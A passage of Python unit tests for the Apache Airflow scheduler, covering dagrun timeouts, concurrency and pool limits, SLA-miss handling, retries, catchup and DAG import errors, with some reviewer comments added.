    DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow')
    session = settings.Session()
    orm_dag = DagModel(dag_id=dag.dag_id)
    session.merge(orm_dag)
    session.commit()
    scheduler = SchedulerJob()
    dag.clear()
    dr = scheduler.create_dag_run(dag)
    self.assertIsNotNone(dr)
    # push the run's start past the timeout window
    dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
    session.merge(dr)
    session.commit()
    # creating the next run triggers the timeout check on the first one
    dr2 = scheduler.create_dag_run(dag)
    self.assertIsNotNone(dr2)
    dr.refresh_from_db(session=session)
    self.assertEqual(dr.state, State.FAILED)
def test_scheduler_verify_max_active_runs_and_dagrun_timeout(self):
    """
    Test that a dagrun will not be scheduled if max_dag_runs has been
    reached and dagrun_timeout is not reached, and that it WILL be
    scheduled once max_dag_runs is reached but dagrun_timeout has passed.
    """
    dag = DAG(
        dag_id='test_scheduler_verify_max_active_runs_and_dagrun_timeout',
        start_date=DEFAULT_DATE)
    dag.max_active_runs = 1
    dag.dagrun_timeout = datetime.timedelta(seconds=60)
    dag_task1 = DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow')
    session = settings.Session()
    orm_dag = DagModel(dag_id=dag.dag_id)
    session.merge(orm_dag)
    session.commit()
    session.close()
    scheduler = SchedulerJob()
    dag.clear()
    dr = scheduler.create_dag_run(dag)
    self.assertIsNotNone(dr)
    # Should not be scheduled as DagRun has not timedout and max_active_runs is reached
    new_dr = scheduler.create_dag_run(dag)
    self.assertIsNone(new_dr)
    # Should be scheduled as dagrun_timeout has passed
    dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
    session.merge(dr)
    session.commit()
    new_dr = scheduler.create_dag_run(dag)
    self.assertIsNotNone(new_dr)
def test_scheduler_max_active_runs_respected_after_clear(self):
    """
    Test if _process_task_instances only schedules ti's up to max_active_runs
    (related to issue AIRFLOW-137)
    """
    dag = DAG(
        dag_id='test_scheduler_max_active_runs_respected_after_clear',
        start_date=DEFAULT_DATE)
    dag.max_active_runs = 3
    dag_task1 = DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow')
    session = settings.Session()
    orm_dag = DagModel(dag_id=dag.dag_id)
    session.merge(orm_dag)
    session.commit()
    session.close()
    scheduler = SchedulerJob()
    dag.clear()
    # First create up to 3 dagruns in RUNNING state.
    # NOTE(review): only ONE create_dag_run call appears here although the
    # comment above says 3 -- confirm whether two calls were lost from this
    # excerpt; with a single run the "should be one, not 3" assertion below
    # is trivially satisfied.
    scheduler.create_dag_run(dag)
    # Reduce max_active_runs to 1
    dag.max_active_runs = 1
    queue = Mock()
    # and schedule them in, so we can check how many
    # tasks are put on the queue (should be one, not 3)
    scheduler._process_task_instances(dag, queue=queue)
    queue.append.assert_called_with(
        (dag.dag_id, dag_task1.task_id, DEFAULT_DATE)
    )
@patch.object(TI, 'pool_full')
def test_scheduler_verify_pool_full(self, mock_pool_full):
    """
    Test task instances not queued when pool is full.

    FIX: replaced deprecated ``assertEquals`` with ``assertEqual``.
    """
    # patched pool_full reports "not full" so TIs pass the scheduling dep
    mock_pool_full.return_value = False
    dag = DAG(
        dag_id='test_scheduler_verify_pool_full',
        start_date=DEFAULT_DATE)
    DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow',
        pool='test_scheduler_verify_pool_full')
    session = settings.Session()
    # pool with a single slot: only one TI may be sent to the executor
    pool = Pool(pool='test_scheduler_verify_pool_full', slots=1)
    session.add(pool)
    orm_dag = DagModel(dag_id=dag.dag_id)
    orm_dag.is_paused = False
    session.merge(orm_dag)
    session.commit()
    scheduler = SchedulerJob()
    dag.clear()
    # Create 2 dagruns, which will create 2 task instances.
    dr = scheduler.create_dag_run(dag)
    self.assertIsNotNone(dr)
    self.assertEqual(dr.execution_date, DEFAULT_DATE)
    dr = scheduler.create_dag_run(dag)
    self.assertIsNotNone(dr)
    queue = []
    scheduler._process_task_instances(dag, queue=queue)
    self.assertEqual(len(queue), 2)
    dagbag = self._make_simple_dag_bag([dag])
    # Recreated part of the scheduler here, to kick off tasks -> executor
    for ti_key in queue:
        task = dag.get_task(ti_key[1])
        ti = TI(task, ti_key[2])
        # Task starts out in the scheduled state. All tasks in the
        # scheduled state will be sent to the executor
        ti.state = State.SCHEDULED
        # Also save this task instance to the DB.
        session.merge(ti)
        session.commit()
    scheduler._execute_task_instances(dagbag,
                                      (State.SCHEDULED,
                                       State.UP_FOR_RETRY))
    # only one pool slot -> only one TI queued on the executor
    self.assertEqual(len(scheduler.executor.queued_tasks), 1)
def test_scheduler_auto_align(self):
    """
    Test if the schedule_interval will be auto aligned with the start_date
    such that if the start_date coincides with the schedule the first
    execution_date will be start_date, otherwise it will be start_date +
    interval.

    FIX: replaced deprecated ``assertEquals`` with ``assertEqual``.
    """
    # start_date does NOT coincide with the cron schedule
    # -> first execution_date is aligned forward to the next slot
    dag = DAG(
        dag_id='test_scheduler_auto_align_1',
        start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
        schedule_interval="4 5 * * *"
    )
    DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow')
    session = settings.Session()
    orm_dag = DagModel(dag_id=dag.dag_id)
    session.merge(orm_dag)
    session.commit()
    scheduler = SchedulerJob()
    dag.clear()
    dr = scheduler.create_dag_run(dag)
    self.assertIsNotNone(dr)
    self.assertEqual(dr.execution_date, timezone.datetime(2016, 1, 2, 5, 4))
    # start_date coincides with the schedule
    # -> first execution_date is the start_date itself
    dag = DAG(
        dag_id='test_scheduler_auto_align_2',
        start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
        schedule_interval="10 10 * * *"
    )
    DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow')
    session = settings.Session()
    orm_dag = DagModel(dag_id=dag.dag_id)
    session.merge(orm_dag)
    session.commit()
    scheduler = SchedulerJob()
    dag.clear()
    dr = scheduler.create_dag_run(dag)
    self.assertIsNotNone(dr)
    self.assertEqual(dr.execution_date, timezone.datetime(2016, 1, 1, 10, 10))
def test_scheduler_reschedule(self):
    """
    Checks if tasks that are not taken up by the executor
    get rescheduled.

    FIX: replaced deprecated ``assertEquals`` with ``assertEqual``.
    """
    executor = TestExecutor()
    dagbag = DagBag(executor=executor)
    dagbag.dags.clear()
    dagbag.executor = executor
    dag = DAG(
        dag_id='test_scheduler_reschedule',
        start_date=DEFAULT_DATE)
    DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow')
    dag.clear()
    dag.is_subdag = False
    session = settings.Session()
    orm_dag = DagModel(dag_id=dag.dag_id)
    orm_dag.is_paused = False
    session.merge(orm_dag)
    session.commit()
    dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)

    @mock.patch('airflow.models.DagBag', return_value=dagbag)
    @mock.patch('airflow.models.DagBag.collect_dags')
    def do_schedule(function, function2):
        # Use a empty file since the above mock will return the
        # expected DAGs. Also specify only a single file so that it doesn't
        # try to schedule the above DAG repeatedly.
        scheduler = SchedulerJob(num_runs=1,
                                 executor=executor,
                                 subdir=os.path.join(settings.DAGS_FOLDER,
                                                     "no_dags.py"))
        scheduler.heartrate = 0
        scheduler.run()

    do_schedule()
    self.assertEqual(1, len(executor.queued_tasks))
    # simulate the executor never taking up the task
    executor.queued_tasks.clear()
    do_schedule()
    # the task was queued again on the next scheduler pass
    self.assertEqual(2, len(executor.queued_tasks))
def test_scheduler_sla_miss_callback(self):
    """
    Test that the scheduler does not call the sla_miss_callback when a notification has already been sent
    """
    session = settings.Session()
    # Mock the callback function so we can verify that it was not called
    sla_callback = MagicMock()
    # Create dag with a start of 2 days ago, but an sla of 1 day ago so we'll already have an sla_miss on the books
    test_start_date = days_ago(2)
    dag = DAG(dag_id='test_sla_miss',
              sla_miss_callback=sla_callback,
              default_args={'start_date': test_start_date,
                            'sla': datetime.timedelta(days=1)})
    task = DummyOperator(task_id='dummy',
                         dag=dag,
                         owner='airflow')
    # Create a TaskInstance for two days ago
    session.merge(models.TaskInstance(task=task,
                                      execution_date=test_start_date,
                                      state='success'))
    # Create an SlaMiss where notification was sent, but email was not
    session.merge(models.SlaMiss(task_id='dummy',
                                 dag_id='test_sla_miss',
                                 execution_date=test_start_date,
                                 email_sent=False,
                                 notification_sent=True))
    # Now call manage_slas and see if the sla_miss callback gets called
    scheduler = SchedulerJob(dag_id='test_sla_miss',
                             num_runs=1)
    scheduler.manage_slas(dag=dag, session=session)
    # notification_sent=True above -> the callback must be skipped
    sla_callback.assert_not_called()
def test_scheduler_sla_miss_callback_exception(self):
    """
    Test that the scheduler gracefully logs an exception if there is a problem
    calling the sla_miss_callback.

    FIX: the TaskInstance state was 'Success', which does not equal
    State.SUCCESS ('success'); use the lowercase value consistently with
    test_scheduler_sla_miss_callback.
    """
    session = settings.Session()
    # the callback raises, and manage_slas must log instead of crashing
    sla_callback = MagicMock(side_effect=RuntimeError('Could not call function'))
    test_start_date = days_ago(2)
    dag = DAG(dag_id='test_sla_miss',
              sla_miss_callback=sla_callback,
              default_args={'start_date': test_start_date})
    task = DummyOperator(task_id='dummy',
                         dag=dag,
                         owner='airflow',
                         sla=datetime.timedelta(hours=1))
    session.merge(models.TaskInstance(task=task,
                                      execution_date=test_start_date,
                                      state='success'))
    # Create an SlaMiss so manage_slas has a miss to process
    session.merge(models.SlaMiss(task_id='dummy',
                                 dag_id='test_sla_miss',
                                 execution_date=test_start_date))
    # Now call manage_slas and see if the sla_miss callback gets called
    scheduler = SchedulerJob(dag_id='test_sla_miss')
    with mock.patch('airflow.jobs.SchedulerJob.log',
                    new_callable=PropertyMock) as mock_log:
        scheduler.manage_slas(dag=dag, session=session)
        sla_callback.assert_called()
        mock_log().exception.assert_called_with(
            'Could not call sla_miss_callback for DAG %s',
            'test_sla_miss')
@mock.patch("airflow.utils.email.send_email")
def test_scheduler_sla_miss_email_exception(self, mock_send_email):
    """
    Test that the scheduler gracefully logs an exception if there is a problem
    sending an email.

    FIX: the TaskInstance state was 'Success', which does not equal
    State.SUCCESS ('success'); use the lowercase value consistently with
    test_scheduler_sla_miss_callback.
    """
    session = settings.Session()
    # Mock the email sender so it fails; manage_slas must log, not crash
    mock_send_email.side_effect = RuntimeError('Could not send an email')
    test_start_date = days_ago(2)
    dag = DAG(dag_id='test_sla_miss',
              default_args={'start_date': test_start_date,
                            'sla': datetime.timedelta(days=1)})
    task = DummyOperator(task_id='dummy',
                         dag=dag,
                         owner='airflow',
                         email='test@test.com',
                         sla=datetime.timedelta(hours=1))
    session.merge(models.TaskInstance(task=task,
                                      execution_date=test_start_date,
                                      state='success'))
    # Create an SlaMiss so manage_slas attempts the email notification
    session.merge(models.SlaMiss(task_id='dummy',
                                 dag_id='test_sla_miss',
                                 execution_date=test_start_date))
    scheduler = SchedulerJob(dag_id='test_sla_miss',
                             num_runs=1)
    with mock.patch('airflow.jobs.SchedulerJob.log',
                    new_callable=PropertyMock) as mock_log:
        scheduler.manage_slas(dag=dag, session=session)
        mock_log().exception.assert_called_with(
            'Could not send SLA Miss email notification for DAG %s',
            'test_sla_miss')
def test_retry_still_in_executor(self):
    """
    Checks if the scheduler does not put a task in limbo, when a task is retried
    but is still present in the executor.

    FIX: replaced deprecated ``assertEquals`` with ``assertEqual``.
    """
    executor = TestExecutor()
    dagbag = DagBag(executor=executor)
    dagbag.dags.clear()
    dagbag.executor = executor
    dag = DAG(
        dag_id='test_retry_still_in_executor',
        start_date=DEFAULT_DATE,
        schedule_interval="@once")
    dag_task1 = BashOperator(
        task_id='test_retry_handling_op',
        bash_command='exit 1',
        retries=1,
        dag=dag,
        owner='airflow')
    dag.clear()
    dag.is_subdag = False
    session = settings.Session()
    orm_dag = DagModel(dag_id=dag.dag_id)
    orm_dag.is_paused = False
    session.merge(orm_dag)
    session.commit()
    dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)

    @mock.patch('airflow.models.DagBag', return_value=dagbag)
    @mock.patch('airflow.models.DagBag.collect_dags')
    def do_schedule(function, function2):
        # Use a empty file since the above mock will return the
        # expected DAGs. Also specify only a single file so that it doesn't
        # try to schedule the above DAG repeatedly.
        scheduler = SchedulerJob(num_runs=1,
                                 executor=executor,
                                 subdir=os.path.join(settings.DAGS_FOLDER,
                                                     "no_dags.py"))
        scheduler.heartrate = 0
        scheduler.run()

    do_schedule()
    self.assertEqual(1, len(executor.queued_tasks))

    def run_with_error(task):
        # run the TI and swallow the expected failure of `exit 1`
        try:
            task.run()
        except AirflowException:
            pass

    ti_tuple = six.next(six.itervalues(executor.queued_tasks))
    (command, priority, queue, ti) = ti_tuple
    ti.task = dag_task1
    self.assertEqual(ti.try_number, 1)
    # fail execution
    run_with_error(ti)
    self.assertEqual(ti.state, State.UP_FOR_RETRY)
    self.assertEqual(ti.try_number, 2)
    ti.refresh_from_db(lock_for_update=True, session=session)
    ti.state = State.SCHEDULED
    session.merge(ti)
    session.commit()
    # do not schedule: the task is still sitting in the executor's queue
    do_schedule()
    self.assertTrue(executor.has_task(ti))
    ti.refresh_from_db()
    self.assertEqual(ti.state, State.SCHEDULED)
    # now the executor has cleared and it should be allowed the re-queue
    executor.queued_tasks.clear()
    do_schedule()
    ti.refresh_from_db()
    self.assertEqual(ti.state, State.QUEUED)
@unittest.skipUnless("INTEGRATION" in os.environ, "Can only run end to end")
def test_retry_handling_job(self):
    """
    Integration test of the scheduler not accidentally resetting
    the try_numbers for a task
    """
    dag = self.dagbag.get_dag('test_retry_handling_job')
    failing_task = dag.get_task("test_retry_handling_op")
    dag.clear()
    scheduler = SchedulerJob(dag_id=dag.dag_id, num_runs=1)
    scheduler.heartrate = 0
    scheduler.run()
    session = settings.Session()
    ti = session.query(TI).filter(
        TI.dag_id == dag.dag_id,
        TI.task_id == failing_task.task_id).first()
    # make sure the counter has increased
    self.assertEqual(2, ti.try_number)
    self.assertEqual(State.UP_FOR_RETRY, ti.state)
def test_scheduler_run_duration(self):
    """
    Verifies that the scheduler run duration limit is followed.
    """
    dag_id = 'test_start_date_scheduling'
    dag = self.dagbag.get_dag(dag_id)
    dag.clear()
    # this dag never schedules anything (future start date),
    # so the run ends only because of run_duration
    self.assertTrue(dag.start_date > DEFAULT_DATE)
    expected_run_duration = 5
    start_time = timezone.utcnow()
    scheduler = SchedulerJob(dag_id, run_duration=expected_run_duration)
    scheduler.run()
    elapsed = (timezone.utcnow() - start_time).total_seconds()
    logging.info("Test ran in %.2fs, expected %.2fs",
                 elapsed,
                 expected_run_duration)
    self.assertLess(elapsed - expected_run_duration, 5.0)
def test_dag_with_system_exit(self):
    """
    Test to check that a DAG with a system.exit() doesn't break the scheduler.
    """
    dag_id = 'exit_test_dag'
    dag_ids = [dag_id]
    dag_directory = os.path.join(settings.DAGS_FOLDER,
                                 "..",
                                 "dags_with_system_exit")
    dagbag = DagBag(dag_folder=os.path.join(dag_directory,
                                            'b_test_scheduler_dags.py'))
    for each_id in dag_ids:
        dagbag.get_dag(each_id).clear()
    scheduler = SchedulerJob(dag_ids=dag_ids,
                             subdir=dag_directory,
                             num_runs=1)
    scheduler.run()
    # the sibling dag that calls sys.exit() must not prevent this one
    # from getting its task instance scheduled
    session = settings.Session()
    self.assertEqual(
        len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
def test_dag_get_active_runs(self):
    """
    Test to check that a DAG returns its active runs.

    Builds a three-task linear DAG, creates a dagrun via the scheduler, then
    verifies the dagrun's execution date appears in DAG.get_active_runs().
    """
    now = timezone.utcnow()
    six_hours_ago_to_the_hour = (now - datetime.timedelta(hours=6)).replace(minute=0, second=0, microsecond=0)
    START_DATE = six_hours_ago_to_the_hour
    DAG_NAME1 = 'get_active_runs_test'
    default_args = {
        'owner': 'airflow',
        'depends_on_past': False,
        'start_date': START_DATE
    }
    dag1 = DAG(DAG_NAME1,
               schedule_interval='* * * * *',
               max_active_runs=1,
               default_args=default_args
               )
    run_this_1 = DummyOperator(task_id='run_this_1', dag=dag1)
    run_this_2 = DummyOperator(task_id='run_this_2', dag=dag1)
    run_this_2.set_upstream(run_this_1)
    run_this_3 = DummyOperator(task_id='run_this_3', dag=dag1)
    run_this_3.set_upstream(run_this_2)
    session = settings.Session()
    orm_dag = DagModel(dag_id=dag1.dag_id)
    session.merge(orm_dag)
    session.commit()
    session.close()
    scheduler = SchedulerJob()
    dag1.clear()
    dr = scheduler.create_dag_run(dag1)
    # We had better get a dag run
    self.assertIsNotNone(dr)
    execution_date = dr.execution_date
    running_dates = dag1.get_active_runs()
    try:
        running_date = running_dates[0]
    except IndexError:
        # Only an empty result list is expected here; the original bare
        # "except:" would also have swallowed SystemExit/KeyboardInterrupt.
        running_date = 'Except'
    self.assertEqual(execution_date, running_date, 'Running Date must match Execution Date')
def test_dag_catchup_option(self):
    """
    Test to check that a DAG with catchup = False only schedules beginning now, not back to the start date
    """
    def setup_dag(dag_id, schedule_interval, start_date, catchup):
        # Build a three-task linear DAG and register it in the ORM.
        default_args = {
            'owner': 'airflow',
            'depends_on_past': False,
            'start_date': start_date
        }
        dag = DAG(dag_id,
                  schedule_interval=schedule_interval,
                  max_active_runs=1,
                  catchup=catchup,
                  default_args=default_args)
        t1 = DummyOperator(task_id='t1', dag=dag)
        t2 = DummyOperator(task_id='t2', dag=dag)
        t2.set_upstream(t1)
        t3 = DummyOperator(task_id='t3', dag=dag)
        t3.set_upstream(t2)
        session = settings.Session()
        orm_dag = DagModel(dag_id=dag.dag_id)
        session.merge(orm_dag)
        session.commit()
        session.close()
        return dag
    now = timezone.utcnow()
    six_hours_ago_to_the_hour = (now - datetime.timedelta(hours=6)).replace(
        minute=0, second=0, microsecond=0)
    half_an_hour_ago = now - datetime.timedelta(minutes=30)
    two_hours_ago = now - datetime.timedelta(hours=2)
    scheduler = SchedulerJob()
    dag1 = setup_dag(dag_id='dag_with_catchup',
                     schedule_interval='* * * * *',
                     start_date=six_hours_ago_to_the_hour,
                     catchup=True)
    # Sanity-check that catchup defaults to True in the test configuration.
    default_catchup = configuration.conf.getboolean('scheduler', 'catchup_by_default')
    self.assertEqual(default_catchup, True)
    self.assertEqual(dag1.catchup, True)
    dag2 = setup_dag(dag_id='dag_without_catchup_ten_minute',
                     schedule_interval='*/10 * * * *',
                     start_date=six_hours_ago_to_the_hour,
                     catchup=False)
    dr = scheduler.create_dag_run(dag2)
    # We had better get a dag run
    self.assertIsNotNone(dr)
    # The DR should be scheduled in the last half an hour, not 6 hours ago
    self.assertGreater(dr.execution_date, half_an_hour_ago)
    # The DR should be scheduled BEFORE now
    self.assertLess(dr.execution_date, timezone.utcnow())
    dag3 = setup_dag(dag_id='dag_without_catchup_hourly',
                     schedule_interval='@hourly',
                     start_date=six_hours_ago_to_the_hour,
                     catchup=False)
    dr = scheduler.create_dag_run(dag3)
    # We had better get a dag run
    self.assertIsNotNone(dr)
    # The DR should be scheduled in the last 2 hours, not 6 hours ago
    self.assertGreater(dr.execution_date, two_hours_ago)
    # The DR should be scheduled BEFORE now
    self.assertLess(dr.execution_date, timezone.utcnow())
    dag4 = setup_dag(dag_id='dag_without_catchup_once',
                     schedule_interval='@once',
                     start_date=six_hours_ago_to_the_hour,
                     catchup=False)
    dr = scheduler.create_dag_run(dag4)
    self.assertIsNotNone(dr)
def test_add_unparseable_file_before_sched_start_creates_import_error(self):
    """An unparseable DAG file present before the scheduler's first loop
    should produce exactly one ImportError row pointing at that file."""
    try:
        dags_folder = mkdtemp()
        unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
        with open(unparseable_filename, 'w') as unparseable_file:
            unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
        self.run_single_scheduler_loop_with_no_dags(dags_folder)
    finally:
        # Always clean up the temp folder, even if the scheduler loop raised.
        shutil.rmtree(dags_folder)
    session = settings.Session()
    import_errors = session.query(models.ImportError).all()
    self.assertEqual(len(import_errors), 1)
    import_error = import_errors[0]
    self.assertEqual(import_error.filename,
                     unparseable_filename)
    self.assertEqual(import_error.stacktrace,
                     "invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_add_unparseable_file_after_sched_start_creates_import_error(self):
    """An unparseable DAG file added after an initial scheduler loop should
    still produce exactly one ImportError row on the next loop."""
    try:
        dags_folder = mkdtemp()
        unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
        # First loop runs against an empty folder.
        self.run_single_scheduler_loop_with_no_dags(dags_folder)
        with open(unparseable_filename, 'w') as unparseable_file:
            unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
        self.run_single_scheduler_loop_with_no_dags(dags_folder)
    finally:
        shutil.rmtree(dags_folder)
    session = settings.Session()
    import_errors = session.query(models.ImportError).all()
    self.assertEqual(len(import_errors), 1)
    import_error = import_errors[0]
    self.assertEqual(import_error.filename,
                     unparseable_filename)
    self.assertEqual(import_error.stacktrace,
                     "invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_no_import_errors_with_parseable_dag(self):
    """A syntactically valid DAG file must not create any ImportError rows."""
    try:
        dags_folder = mkdtemp()
        parseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
        with open(parseable_filename, 'w') as parseable_file:
            parseable_file.writelines(PARSEABLE_DAG_FILE_CONTENTS)
        self.run_single_scheduler_loop_with_no_dags(dags_folder)
    finally:
        shutil.rmtree(dags_folder)
    session = settings.Session()
    import_errors = session.query(models.ImportError).all()
    self.assertEqual(len(import_errors), 0)
def test_new_import_error_replaces_old(self):
    """Rewriting a broken DAG file should replace its ImportError row rather
    than accumulate a second one."""
    try:
        dags_folder = mkdtemp()
        unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
        # Generate original import error
        with open(unparseable_filename, 'w') as unparseable_file:
            unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
        self.run_single_scheduler_loop_with_no_dags(dags_folder)
        # Generate replacement import error (the error will be on the second line now)
        with open(unparseable_filename, 'w') as unparseable_file:
            unparseable_file.writelines(
                PARSEABLE_DAG_FILE_CONTENTS +
                os.linesep +
                UNPARSEABLE_DAG_FILE_CONTENTS)
        self.run_single_scheduler_loop_with_no_dags(dags_folder)
    finally:
        shutil.rmtree(dags_folder)
    session = settings.Session()
    import_errors = session.query(models.ImportError).all()
    # Still one row, but the stacktrace now points at line 2.
    self.assertEqual(len(import_errors), 1)
    import_error = import_errors[0]
    self.assertEqual(import_error.filename,
                     unparseable_filename)
    self.assertEqual(import_error.stacktrace,
                     "invalid syntax ({}, line 2)".format(TEMP_DAG_FILENAME))
def test_remove_error_clears_import_error(self):
    """Fixing a previously broken DAG file should delete its ImportError row."""
    try:
        dags_folder = mkdtemp()
        filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
        # Generate original import error
        with open(filename_to_parse, 'w') as file_to_parse:
            file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
        self.run_single_scheduler_loop_with_no_dags(dags_folder)
        # Remove the import error from the file
        with open(filename_to_parse, 'w') as file_to_parse:
            file_to_parse.writelines(
                PARSEABLE_DAG_FILE_CONTENTS)
        self.run_single_scheduler_loop_with_no_dags(dags_folder)
    finally:
        shutil.rmtree(dags_folder)
    session = settings.Session()
    import_errors = session.query(models.ImportError).all()
    self.assertEqual(len(import_errors), 0)
def test_remove_file_clears_import_error(self):
    """Deleting a broken DAG file should delete its ImportError row."""
    try:
        dags_folder = mkdtemp()
        filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
        # Generate original import error
        with open(filename_to_parse, 'w') as file_to_parse:
            file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
        self.run_single_scheduler_loop_with_no_dags(dags_folder)
    finally:
        shutil.rmtree(dags_folder)
    # Rerun the scheduler once the dag file has been removed
    self.run_single_scheduler_loop_with_no_dags(dags_folder)
    session = settings.Session()
    import_errors = session.query(models.ImportError).all()
    self.assertEqual(len(import_errors), 0)
def test_list_py_file_paths(self):
    """
    [JIRA-1357] Test the 'list_py_file_paths' function used by the
    scheduler to list and load DAGs.
    """
    # Every .py/.zip entry in the folder is expected, except the one file
    # that deliberately contains no DAG definitions.
    expected_files = [
        '{}/{}'.format(TEST_DAGS_FOLDER, file_name)
        for file_name in os.listdir(TEST_DAGS_FOLDER)
        if (file_name.endswith('.py') or file_name.endswith('.zip'))
        and file_name not in ['no_dags.py']
    ]
    detected_files = [file_path for file_path in list_py_file_paths(TEST_DAGS_FOLDER)]
    self.assertEqual(sorted(detected_files), sorted(expected_files))
def test_reset_orphaned_tasks_nothing(self):
    """Try with nothing. """
    session = settings.Session()
    scheduler = SchedulerJob()
    # With no dagruns or task instances, nothing should be reset.
    reset = scheduler.reset_state_for_orphaned_tasks(session=session)
    self.assertEqual(0, len(reset))
def test_reset_orphaned_tasks_external_triggered_dag(self):
    """An orphaned SCHEDULED task in an externally triggered, RUNNING dagrun
    should still be reset."""
    dag_id = 'test_reset_orphaned_tasks_external_triggered_dag'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
    task_id = dag_id + '_task'
    DummyOperator(task_id=task_id, dag=dag)
    scheduler = SchedulerJob()
    session = settings.Session()
    dr1 = scheduler.create_dag_run(dag, session=session)
    ti = dr1.get_task_instances(session=session)[0]
    # Put the run/task into the orphan-eligible combination of states.
    dr1.state = State.RUNNING
    ti.state = State.SCHEDULED
    dr1.external_trigger = True
    session.merge(ti)
    session.merge(dr1)
    session.commit()
    reset_tis = scheduler.reset_state_for_orphaned_tasks(session=session)
    # assertEquals is a deprecated unittest alias; use assertEqual.
    self.assertEqual(1, len(reset_tis))
def test_reset_orphaned_tasks_backfill_dag(self):
    """Task instances belonging to a backfill dagrun must never be reset."""
    dag_id = 'test_reset_orphaned_tasks_backfill_dag'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
    task_id = dag_id + '_task'
    DummyOperator(task_id=task_id, dag=dag)
    scheduler = SchedulerJob()
    session = settings.Session()
    dr1 = scheduler.create_dag_run(dag, session=session)
    ti = dr1.get_task_instances(session=session)[0]
    ti.state = State.SCHEDULED
    dr1.state = State.RUNNING
    # A run_id with the backfill prefix marks the dagrun as a backfill.
    dr1.run_id = BackfillJob.ID_PREFIX + '_sdfsfdfsd'
    session.merge(ti)
    session.merge(dr1)
    session.commit()
    self.assertTrue(dr1.is_backfill)
    # assertEquals is a deprecated unittest alias; use assertEqual.
    self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_specified_dagrun(self):
    """Try to reset when we specify a dagrun and ensure nothing else is."""
    dag_id = 'test_reset_orphaned_tasks_specified_dagrun'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
    task_id = dag_id + '_task'
    DummyOperator(task_id=task_id, dag=dag)
    scheduler = SchedulerJob()
    session = settings.Session()
    # make two dagruns, only reset for one
    dr1 = scheduler.create_dag_run(dag)
    dr2 = scheduler.create_dag_run(dag)
    dr1.state = State.SUCCESS
    dr2.state = State.RUNNING
    ti1 = dr1.get_task_instances(session=session)[0]
    ti2 = dr2.get_task_instances(session=session)[0]
    ti1.state = State.SCHEDULED
    ti2.state = State.SCHEDULED
    session.merge(ti1)
    session.merge(ti2)
    session.merge(dr1)
    session.merge(dr2)
    session.commit()
    reset_tis = scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr2, session=session)
    # assertEquals is a deprecated unittest alias; use assertEqual.
    self.assertEqual(1, len(reset_tis))
    ti1.refresh_from_db(session=session)
    ti2.refresh_from_db(session=session)
    # Only the task in the filtered dagrun (dr2) should have been reset.
    self.assertEqual(State.SCHEDULED, ti1.state)
    self.assertEqual(State.NONE, ti2.state)
def test_reset_orphaned_tasks_nonexistent_dagrun(self):
    """Make sure a task in an orphaned state is not reset if it has no dagrun. """
    dag_id = 'test_reset_orphaned_tasks_nonexistent_dagrun'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
    task_id = dag_id + '_task'
    task = DummyOperator(task_id=task_id, dag=dag)
    scheduler = SchedulerJob()
    session = settings.Session()
    # Create the task instance directly, without any enclosing dagrun.
    ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
    session.add(ti)
    session.commit()
    ti.refresh_from_db()
    ti.state = State.SCHEDULED
    session.merge(ti)
    session.commit()
    # assertEquals is a deprecated unittest alias; use assertEqual.
    self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_no_orphans(self):
    """A RUNNING task in a RUNNING dagrun is not orphaned and must keep its state."""
    dag_id = 'test_reset_orphaned_tasks_no_orphans'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
    task_id = dag_id + '_task'
    DummyOperator(task_id=task_id, dag=dag)
    scheduler = SchedulerJob()
    session = settings.Session()
    dr1 = scheduler.create_dag_run(dag)
    dr1.state = State.RUNNING
    tis = dr1.get_task_instances(session=session)
    tis[0].state = State.RUNNING
    session.merge(dr1)
    session.merge(tis[0])
    session.commit()
    # assertEquals is a deprecated unittest alias; use assertEqual.
    self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
    tis[0].refresh_from_db()
    self.assertEqual(State.RUNNING, tis[0].state)
def test_reset_orphaned_tasks_non_running_dagruns(self):
    """Ensure orphaned tasks with non-running dagruns are not reset."""
    dag_id = 'test_reset_orphaned_tasks_non_running_dagruns'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
    task_id = dag_id + '_task'
    DummyOperator(task_id=task_id, dag=dag)
    scheduler = SchedulerJob()
    session = settings.Session()
    dr1 = scheduler.create_dag_run(dag)
